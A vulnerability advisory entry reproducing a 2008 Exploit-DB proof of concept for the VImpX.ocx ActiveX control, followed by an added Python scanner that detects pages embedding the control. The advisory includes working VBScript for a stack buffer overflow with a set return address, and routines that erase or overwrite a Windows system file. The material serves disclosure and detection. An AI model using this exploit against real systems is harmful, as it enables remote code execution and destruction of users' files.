Vendor: VImpX
By: shinnai
CVSS: 8.8 (HIGH)
Type: Buffer Overflow, File Content Deletion, File Content Overwrite
CWE: 119, 20, 78
Product Name: VImpX
Affected Version From: 4.8.8.0
Affected Version To: 4.8.8.0
Patch Exists: YES
Related CWE: N/A
CPE: a:db_software_laboratory:vimpx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2009

db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities

db Software Laboratory VImpX (VImpX.ocx) is vulnerable to buffer overflow, file content deletion and file content overwrite. Passing an overly long string (more than 256 bytes) to the LogFile property leads to a stack-based buffer overflow which allows arbitrary code execution. The LogFile property and the SaveToFile() method do not check user-supplied arguments: an attacker can set LogFile to a chosen file name and then call ClearLogFile() to delete that file's content, or call SaveToFile() to overwrite the content of the file named in its argument. These vulnerabilities were tested on Windows XP Professional SP3 with Internet Explorer 7.

Mitigation:

Ensure that user supplied arguments are properly validated and sanitized before being used. Update to the latest version of VImpX.ocx.

Exploit-DB raw data:

-----------------------------------------------------------------------------
 db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities
 url: http://www.dbsoftlab.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net
 
 Info:
 File:		VImpX.ocx v. 4.8.8.0
 CLSID:		{7600707B-9F47-416D-8AB5-6FD96EA37968}
 ProgID:	VImpX.VImpAX
 Description:	VImpAX Control
 
 Marked as:
  RegKey Safe for Script: False
  RegKey Safe for Init: False
  Implements IObjectSafety: True
  IDisp Safe: Safe for untrusted: caller,data  
  IPStorage Safe: Safe for untrusted: caller,data
 
 Vulnerable method:
 Property Let LogFile As String
 Sub ClearLogFile
 Sub SaveToFile (ByVal FileName As String)

 Bug(s):
 #1 Passing an overly long string (more than 256 bytes) will lead to
    a stack based buffer overflow which allows arbitrary code execution
  
 #2 The "LogFile()" method doesn't check user supplied arguments so we can
    use it to store the file name we want to clear and then the
    "ClearLogFile()" to delete the content of the file

 #3 The "SaveToFile()" method doesn't check user supplied arguments so we
    can use it to overwrite the content of the file name passed as
    argument.

 This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='test' width='20' height='20'></object>

<input language=VBScript onclick=bof() type=button value='Click here to start the Remote Buffer Overflow test' style="width: 361px; height: 24px" size=21>

<input language=VBScript onclick=afd() type=button value='Click here to start the File Content Deletion test' style="width: 361px; height: 24px" size=21>

<input language=VBScript onclick=afc() type=button value='Click here to start the File Content Corruption test' style="width: 361px; height: 24px" size=21>


<script language='vbscript'>
 Sub bof
  buff = String(256,"A") 
  EDI  = unescape("BBBB") 
  ESI  = unescape("CCCC")
  EBX  = unescape("DDDD") 
  EIP  = unescape("%C6%91%3A%7E") 'unescape("EEEE") 
  buf2 = unescape("FFFFFFFFFFFFFFFFFFFF") 
  memo = unescape("%00%00%01%00") 
  rest = unescape("GGGG") + String(2000, "H")
  egg = buff + EDI + ESI + EBX + EIP + buf2 + memo + rest
  test.LogFile = egg
 End Sub

 Sub afd
  test.LogFile = "C:\WINDOWS\_system.ini"
  test.ClearLogFile
  MsgBox "Exploit completed..."
 End Sub

 Sub afc
  test.SaveToFile "C:\WINDOWS\_system.ini"
  MsgBox "Exploit completed..."
 End Sub
</script>

# milw0rm.com [2008-10-24]
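
A detection sketch for the control described above, added here as an example and not part of the original advisory: it scans HTML (for instance from a proxy or mail gateway) for the advisory's CLSID or ProgID and for script access to the three listed members. The function names, finding labels and sample pages are assumptions constructed for illustration.

```python
import re

# Identifiers copied from the advisory's Info block.
CLSID = "7600707B-9F47-416D-8AB5-6FD96EA37968"
PROGID = "VImpX.VImpAX"
MEMBERS = ("LogFile", "ClearLogFile", "SaveToFile")

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
ATTR = re.compile(r"""\b(classid|id)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""", re.I)
CREATE = re.compile(r"""(?:CreateObject|ActiveXObject)\s*\(\s*['"]%s['"]""" % re.escape(PROGID), re.I)


def _attrs(tag):
    """Collect classid/id attribute values from one <object ...> tag."""
    found = {}
    for m in ATTR.finditer(tag):
        found[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return found


def scan_page(html):
    """Return sorted finding labels for one HTML document (hypothetical helper)."""
    findings, ids = set(), []
    for tag in OBJECT_TAG.findall(html):
        attrs = _attrs(tag)
        classid = attrs.get("classid", "").lower().replace("clsid:", "").strip("{} ")
        if classid == CLSID.lower():
            findings.add("embeds-control")
            if attrs.get("id"):
                ids.append(attrs["id"])
    if CREATE.search(html):
        findings.add("creates-progid")
    # Member access is only reported for element ids bound to the control.
    for obj_id in ids:
        for member in MEMBERS:
            if re.search(r"\b%s\s*\.\s*%s\b" % (re.escape(obj_id), member), html, re.I):
                findings.add("calls-" + member)
    return sorted(findings)


# Constructed sample pages (not captured traffic).
SAMPLE_EMBED = """<object classid="clsid:7600707b-9f47-416d-8ab5-6fd96ea37968" id="ctl"></object>
<script language="vbscript">
ctl.LogFile = "C:\\temp\\import.log"
ctl.ClearLogFile
</script>"""
SAMPLE_OTHER = "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='ctl'></object>"

if __name__ == "__main__":
    for name, page in (("embed", SAMPLE_EMBED), ("other", SAMPLE_OTHER)):
        print(name, scan_page(page))
```

Objects created through the ProgID are reported as `creates-progid` only; this sketch does not track the variable they are assigned to.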